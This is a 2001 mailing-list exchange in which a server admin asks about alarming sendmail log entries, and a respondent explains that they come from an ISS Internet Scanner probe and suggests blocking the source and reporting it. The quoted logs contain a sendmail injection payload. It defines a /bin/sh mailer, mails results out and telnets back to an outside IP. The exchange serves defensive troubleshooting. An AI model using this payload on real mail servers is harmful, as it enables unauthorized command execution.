Hi Eddie, This is probably a scan from someone using ISS Internet Scanner against your server. Given that it's a fairly expensive program I doubt it's a script kiddy (unless there are warez of it floating around somewhere), but the source of the scans is fairly obvious in your logs. Basically it's scanning your server for sendmail vulnerabilities, and emailing any it finds back to [EMAIL PROTECTED] Given that it's Internet Scanner, I recommend you check your other logs as well since it scans for a whole mess of stuff. Note that it's also attempting to telnet back to this guy's box (the 'telnet 203.87.15.193 5701' part), though for what intention I'm not sure. That IP resolves to: ara-as1-p193.netconnect.net.au. Could be dialup, could be DSL, I dunno.
Unless you want traffic from this network for some reason, you may as well just block all inbound and outbound connections to this guy's system/network (netconnect.net.au) to prevent anymore scans or sending of information to him. You may also want to report the scans to his ISP, since his email address is in plain view. Take care, Ralph Forsythe [EMAIL PROTECTED] At 12:03 PM 12/23/2001 -0800, Eddie Bishop wrote: >From: "Edward Bishop" <[EMAIL PROTECTED]> >Date: Sat, 22 Dec 2001 23:25:51 -0000 >Subject: [cobalt-security] Maybe OT: maillog reports attack; other lists? > >I've got four entries in my maillog which I've never seen before and = >which >look terrifying. This is on my non-Cobalt server (RedHat) so I don't = >know if >it's of relevance to this list. If not, apologies - but I'd be grateful = >for >suggestions as to good lists to try, hopefully with people as helpful as = >on >this one. > >Dec 22 15:16:56 ns sendmail[9835]: NOQUEUE: POSSIBLE ATTACK from >ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog, >P=3D/bin/sh, F=3DlsDFMeu, A=3Dsh -c $u^M Mlocal, P=3D/bin/sh, = >F=3DlsDFMeu, A=3Dsh -c >$u^M R<"|/... Vulnerable | mail [EMAIL PROTECTED]">^M R<"|( sleep = >2 ; >echo quit ) |telnet 203.87.15.193 5701" > >Dec 22 15:16:56 ns sendmail[9836]: NOQUEUE: POSSIBLE ATTACK from >ara-as1-p193.netconnect.net.au: newline in string "iss^M Croot^M Mprog, >P=3D/bin/sh, F=3DlsDFMeu, A=3Dsh -c $u^M Mlocal, P=3D/bin/sh, = >F=3DlsDFMeu, A=3Dsh -c >$u^M R<"|/... Vulnerable | mail [EMAIL PROTECTED]">^M R<"|( sleep = >2 ; >echo quit ) |telnet 203.87.15.193 5701" > >Dec 22 15:16:57 ns sendmail[9837]: NOQUEUE: >issCrootMprogP/bin/shFlsDFMeuAsh-c$uMlocalP/bin/shFlsDFMeuAsh-c$uR|/bin/e= >cho >SendmailIdentdBugVulnera: VRFY 1145130318@ISS > >Dec 22 15:16:57 ns sendmail[9838]: NOQUEUE: >issCrootMprogP/bin/shFlsDFMeuAsh-c$uMlocalP/bin/shFlsDFMeuAsh-c$uR|/bin/e= >cho >SendmailIdentdBugVulnera: VRFY 1145130318@ISS > >-- >Eddie Bishop _______________________________________________ cobalt-security mailing list [EMAIL PROTECTED] http://list.cobalt.com/mailman/listinfo/cobalt-security
